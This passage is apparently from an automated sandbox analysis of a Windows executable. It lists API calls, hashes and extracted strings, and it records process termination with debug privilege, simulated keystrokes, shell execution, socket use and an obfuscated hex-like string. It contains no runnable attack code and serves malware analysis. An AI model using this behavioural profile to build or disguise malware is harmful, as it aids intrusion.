                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window_wcscat
                                                  • String ID: SysListView32
                                                  • API String ID: 307300125-78025650
                                                  • Opcode ID: 31094afb804f28e5d79af025b24b5a608fd43765720f35bc3b66a2d5393cb1db
                                                  • Instruction ID: 2a81061cc1eb42d39d4d4f43c0fdc23a9858269db001a7042380b218b95613aa
                                                  • Opcode Fuzzy Hash: 31094afb804f28e5d79af025b24b5a608fd43765720f35bc3b66a2d5393cb1db
                                                  • Instruction Fuzzy Hash: 3B419174A00348ABEF219F64CC85BEE77F8FF09750F10446AF594A7191D6719E858B60
                                                  APIs
                                                    • Part of subcall function 00C23C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00C23C7A
                                                    • Part of subcall function 00C23C55: Process32FirstW.KERNEL32(00000000,?), ref: 00C23C88
                                                    • Part of subcall function 00C23C55: CloseHandle.KERNEL32(00000000), ref: 00C23D52
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C3E9A4
                                                  • GetLastError.KERNEL32 ref: 00C3E9B7
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C3E9E6
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C3EA63
                                                  • GetLastError.KERNEL32(00000000), ref: 00C3EA6E
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C3EAA3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2533919879-2896544425
                                                  • Opcode ID: aea6573537c703dcddc181eeef4bee5aad4cef44644fbadbb8964669490896e8
                                                  • Instruction ID: 1c67c14b8e01caac49c8a4a04a2eb78ea73c9aef210aa60bd65227db90f7b481
                                                  • Opcode Fuzzy Hash: aea6573537c703dcddc181eeef4bee5aad4cef44644fbadbb8964669490896e8
                                                  • Instruction Fuzzy Hash: 0741CB31200201AFDB14EF24CCA5FAEBBE5BF41310F04845CF9529B2D2DB74A945EB91
                                                  APIs
                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00C23033
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: IconLoad
                                                  • String ID: blank$info$question$stop$warning
                                                  • API String ID: 2457776203-404129466
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C24312
                                                  • LoadStringW.USER32(00000000), ref: 00C24319
                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C2432F
                                                  • LoadStringW.USER32(00000000), ref: 00C24336
                                                  • _wprintf.LIBCMT ref: 00C2435C
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C2437A
                                                  Strings
                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00C24357
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                  • API String ID: 3648134473-3128320259
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • GetSystemMetrics.USER32(0000000F), ref: 00C4D47C
                                                  • GetSystemMetrics.USER32(0000000F), ref: 00C4D49C
                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C4D6D7
                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C4D6F5
                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C4D716
                                                  • ShowWindow.USER32(00000003,00000000), ref: 00C4D735
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00C4D75A
                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00C4D77D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                  • String ID:
                                                  • API String ID: 1211466189-0
                                                  APIs
                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00BFC1C7,00000004,00000000,00000000,00000000), ref: 00BC2ACF
                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00BFC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00BC2B17
                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00BFC1C7,00000004,00000000,00000000,00000000), ref: 00BFC21A
                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00BFC1C7,00000004,00000000,00000000,00000000), ref: 00BFC286
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C270DD
                                                    • Part of subcall function 00BE0DB6: std::exception::exception.LIBCMT ref: 00BE0DEC
                                                    • Part of subcall function 00BE0DB6: __CxxThrowException@8.LIBCMT ref: 00BE0E01
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C27114
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00C27130
                                                  • _memmove.LIBCMT ref: 00C2717E
                                                  • _memmove.LIBCMT ref: 00C2719B
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00C271AA
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C271BF
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C271DE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 256516436-0
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 00C461EB
                                                  • GetDC.USER32(00000000), ref: 00C461F3
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C461FE
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00C4620A
                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C46246
                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C46257
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C4902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00C46291
                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C462B1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                  • String ID:
                                                  • API String ID: 3864802216-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  APIs
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                    • Part of subcall function 00BDFC86: _wcscpy.LIBCMT ref: 00BDFCA9
                                                  • _wcstok.LIBCMT ref: 00C2EC94
                                                  • _wcscpy.LIBCMT ref: 00C2ED23
                                                  • _memset.LIBCMT ref: 00C2ED56
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                  • String ID: X
                                                  • API String ID: 774024439-3081909835
                                                  APIs
                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C36C00
                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C36C21
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C36C34
                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 00C36CEA
                                                  • inet_ntoa.WSOCK32(?), ref: 00C36CA7
                                                    • Part of subcall function 00C1A7E9: _strlen.LIBCMT ref: 00C1A7F3
                                                    • Part of subcall function 00C1A7E9: _memmove.LIBCMT ref: 00C1A815
                                                  • _strlen.LIBCMT ref: 00C36D44
                                                  • _memmove.LIBCMT ref: 00C36DAD
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                  • String ID:
                                                  • API String ID: 3619996494-0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  • IsWindow.USER32(00EE54C8), ref: 00C4B3EB
                                                  • IsWindowEnabled.USER32(00EE54C8), ref: 00C4B3F7
                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00C4B4DB
                                                  • SendMessageW.USER32(00EE54C8,000000B0,?,?), ref: 00C4B512
                                                  • IsDlgButtonChecked.USER32(?,?), ref: 00C4B54F
                                                  • GetWindowLongW.USER32(00EE54C8,000000EC), ref: 00C4B571
                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C4B589
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                  • String ID:
                                                  • API String ID: 4072528602-0
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C3F448
                                                  • _memset.LIBCMT ref: 00C3F511
                                                  • ShellExecuteExW.SHELL32(?), ref: 00C3F556
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                    • Part of subcall function 00BDFC86: _wcscpy.LIBCMT ref: 00BDFCA9
                                                  • GetProcessId.KERNEL32(00000000), ref: 00C3F5CD
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C3F5FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                  • String ID: @
                                                  • API String ID: 3522835683-2766056989
                                                  • Opcode ID: 7d8a6e91b0cde9ca51a37b0f3659709e65ed753d9708228a963ea99447874363
                                                  • Instruction ID: 388d0b6d6d39fe9d6af6b7cd2587b11cd00c70afe33a93f3b4ab55f93697ae9e
                                                  • Opcode Fuzzy Hash: 7d8a6e91b0cde9ca51a37b0f3659709e65ed753d9708228a963ea99447874363
                                                  • Instruction Fuzzy Hash: 48615C75E006199FDB14DF64C885AAEBBF5FF49310F1484ADE856AB351CB30AE42CB90
                                                  APIs
                                                  • GetParent.USER32(?), ref: 00C20F8C
                                                  • GetKeyboardState.USER32(?), ref: 00C20FA1
                                                  • SetKeyboardState.USER32(?), ref: 00C21002
                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C21030
                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C2104F
                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C21095
                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C210B8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: 4e06f19d0dc66b4adbde6895fc7233b8212673a11570c6486181865d242b2650
                                                  • Instruction ID: b8a4f50a604e84860fc58624bc5fdff87364fa64011d03284976817afe9ba4bd
                                                  • Opcode Fuzzy Hash: 4e06f19d0dc66b4adbde6895fc7233b8212673a11570c6486181865d242b2650
                                                  • Instruction Fuzzy Hash: 205125605447E53DFB3642749C05BBABEA96B16300F0C858AF5E485CD3C2E8EED5D760
                                                  APIs
                                                  • GetParent.USER32(00000000), ref: 00C20DA5
                                                  • GetKeyboardState.USER32(?), ref: 00C20DBA
                                                  • SetKeyboardState.USER32(?), ref: 00C20E1B
                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C20E47
                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C20E64
                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C20EA8
                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C20EC9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: ecf4d906e81d3f992e70984911a3cb7a547239e20304b44dbe51b9abf6a81e76
                                                  • Instruction ID: ece044f1841a6c0eca0c4b6af1a1534edbabc80704801e2e6565f0282d98a944
                                                  • Opcode Fuzzy Hash: ecf4d906e81d3f992e70984911a3cb7a547239e20304b44dbe51b9abf6a81e76
                                                  • Instruction Fuzzy Hash: CE51D5A15447E57DFB3283649C45B7ABFA96B06300F18888EF1E486CC3D395AED4E760
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _wcsncpy$LocalTime
                                                  • String ID:
                                                  • API String ID: 2945705084-0
                                                  • Opcode ID: 7a8dfb07e8731b70505187589d2dbc2d97303385d4ac0671d413a30124cf82ac
                                                  • Instruction ID: 9e7fc855e801664d8cb45e1a64ae5124aab3b4244246009ea27078d7dc408100
                                                  • Opcode Fuzzy Hash: 7a8dfb07e8731b70505187589d2dbc2d97303385d4ac0671d413a30124cf82ac
                                                  • Instruction Fuzzy Hash: F941A275C1065476CB11EBB59C8AACFB3FCAF04710F5089A6F518E3221EB34A745C7AA
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00BC2357
                                                  • ScreenToClient.USER32(00C857B0,?), ref: 00BC2374
                                                  • GetAsyncKeyState.USER32(00000001), ref: 00BC2399
                                                  • GetAsyncKeyState.USER32(00000002), ref: 00BC23A7
                                                  Strings
                                                  • jdyakj0yakjcyakjcyakj2yakj8yakj9yakj4yakjdyakjfyakjcyakj5yakj7yakj5yakj6yakj8yakj9yakj6yakj5yakjfyakj4yakj8yakj3yakjeyakj4yakjfyak, xrefs: 00BFBFF9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AsyncState$ClientCursorScreen
                                                  • String ID: jdyakj0yakjcyakjcyakj2yakj8yakj9yakj4yakjdyakjfyakjcyakj5yakj7yakj5yakj6yakj8yakj9yakj6yakj5yakjfyakj4yakj8yakj3yakjeyakj4yakjfyak
                                                  • API String ID: 4210589936-549041074
                                                  • Opcode ID: 06a1fee896b474287e1a3edde2e97250e2c921d79d399a5bc49b9b32187efb58
                                                  • Instruction ID: 5d4db56be18ac9e6f4a46848fcdeced387815fa2c833184f85eb3bcbb6051ab6
                                                  • Opcode Fuzzy Hash: 06a1fee896b474287e1a3edde2e97250e2c921d79d399a5bc49b9b32187efb58
                                                  • Instruction Fuzzy Hash: FC417D35A04109FFCB159F68C884FEDBBB4FB45360F20439AF929922A0CB359994DB95
                                                  APIs
                                                    • Part of subcall function 00C2466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C23697,?), ref: 00C2468B
                                                    • Part of subcall function 00C2466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C23697,?), ref: 00C246A4
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00C236B7
                                                  • _wcscmp.LIBCMT ref: 00C236D3
                                                  • MoveFileW.KERNEL32(?,?), ref: 00C236EB
                                                  • _wcscat.LIBCMT ref: 00C23733
                                                  • SHFileOperationW.SHELL32(?), ref: 00C2379F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                  • String ID: \*.*
                                                  • API String ID: 1377345388-1173974218
                                                  • Opcode ID: 0f543dd78adaa2e7e483ecae9723a6a2105c0360dbe71750e1f5aa065b6a55ac
                                                  • Instruction ID: 5bb7a7ff87477aa37e7cf3324ee7acd1e0288efbd7809a8bc0477c8bb2a33f03
